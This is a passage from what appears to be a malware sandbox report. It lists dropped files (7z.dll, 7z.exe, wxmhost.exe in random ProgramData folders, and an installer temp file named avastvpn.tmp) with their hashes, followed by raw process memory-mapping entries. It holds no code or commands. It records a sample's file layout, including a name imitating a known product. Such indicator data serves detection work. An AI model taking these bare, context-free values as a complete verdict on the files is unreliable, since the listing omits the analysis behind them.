                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\60sKjNzt\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\60sKjNzt\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\60sKjNzt\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\60sKjNzt\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\60sKjNzt\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\60sKjNzt\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • \ProgramData\60sKjNzt\wxmhost.exe
                                                                                                                                          Filesize

                                                                                                                                          6.1MB

                                                                                                                                          MD5

                                                                                                                                          ff326b90fd2d61260ec4fce412188de9

                                                                                                                                          SHA1

                                                                                                                                          3d638dbe6df6711cbb9486efc1108cea67385ac7

                                                                                                                                          SHA256

                                                                                                                                          1a3719c8960c43977abee59e68b9d1fbc1ec1bd24de1cffc6eb09482d5c2e074

                                                                                                                                          SHA512

                                                                                                                                          5d8ad5a425d98c0707316b6dd0d8fd77c2725b9fb3023c87df4460550deff60a3d8ebb9c2cba114c763c9c58bb189ebb7e36e52db2f8a1a4baf2c60ed6182999

                                                                                                                                        • \ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • \ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • \Users\Admin\AppData\Local\Temp\is-OI669.tmp\_isetup\_iscrypt.dll
                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          a69559718ab506675e907fe49deb71e9

                                                                                                                                          SHA1

                                                                                                                                          bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                                          SHA256

                                                                                                                                          2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                                          SHA512

                                                                                                                                          e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                                        • \Users\Admin\AppData\Local\Temp\is-PV9M9.tmp\avastvpn.tmp
                                                                                                                                          Filesize

                                                                                                                                          2.5MB

                                                                                                                                          MD5

                                                                                                                                          78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                          SHA1

                                                                                                                                          57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                          SHA256

                                                                                                                                          92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                          SHA512

                                                                                                                                          1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                        • \Users\Admin\AppData\Local\Temp\is-R3IBD.tmp\_isetup\_iscrypt.dll
                                                                                                                                          Filesize

                                                                                                                                          2KB

                                                                                                                                          MD5

                                                                                                                                          a69559718ab506675e907fe49deb71e9

                                                                                                                                          SHA1

                                                                                                                                          bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                                          SHA256

                                                                                                                                          2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                                          SHA512

                                                                                                                                          e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                                        • \Users\Admin\AppData\Local\Temp\is-S6O90.tmp\772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.tmp
                                                                                                                                          Filesize

                                                                                                                                          2.5MB

                                                                                                                                          MD5

                                                                                                                                          78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                          SHA1

                                                                                                                                          57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                          SHA256

                                                                                                                                          92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                          SHA512

                                                                                                                                          1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                        • memory/420-120-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/432-182-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/468-94-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/576-62-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          816KB

                                                                                                                                        • memory/576-125-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/576-54-0x0000000075471000-0x0000000075473000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/576-55-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          816KB

                                                                                                                                        • memory/596-148-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/672-178-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/740-154-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/812-156-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/840-100-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/888-193-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/948-170-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/948-139-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/952-207-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          588KB

                                                                                                                                        • memory/952-215-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          588KB

                                                                                                                                        • memory/952-209-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          588KB

                                                                                                                                        • memory/952-211-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          588KB

                                                                                                                                        • memory/952-213-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          588KB

                                                                                                                                        • memory/952-206-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          588KB

                                                                                                                                        • memory/952-218-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          588KB

                                                                                                                                        • memory/968-152-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/972-83-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/972-184-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1016-145-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1016-176-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1160-136-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1176-86-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1180-101-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1204-183-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1272-80-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1364-169-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1380-197-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1380-167-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1424-172-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1452-88-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1456-91-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1456-133-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1460-118-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1492-130-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1492-163-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1492-87-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1520-90-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1524-131-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1524-89-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1528-166-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1528-132-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1568-205-0x0000000000800000-0x000000000081C000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          112KB

                                                                                                                                        • memory/1568-202-0x0000000000820000-0x0000000000DCA000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          5.7MB

                                                                                                                                        • memory/1568-201-0x0000000000820000-0x0000000000DCA000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          5.7MB

                                                                                                                                        • memory/1568-203-0x00000000003D0000-0x000000000040C000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          240KB

                                                                                                                                        • memory/1568-204-0x00000000748A0000-0x0000000074920000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          512KB

                                                                                                                                        • memory/1572-134-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1576-105-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1592-107-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1596-147-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1600-175-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1604-110-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1620-112-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1668-189-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1680-71-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          816KB

                                                                                                                                        • memory/1680-67-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1680-78-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          816KB

                                                                                                                                        • memory/1724-186-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1728-104-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1740-140-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1808-58-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1808-63-0x0000000074971000-0x0000000074973000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/1816-75-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1828-146-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1836-129-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1880-168-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1920-124-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1936-95-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1992-64-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1996-159-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/2000-114-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/2004-177-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/2008-149-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/2008-113-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/2016-123-0x0000000000000000-mapping.dmp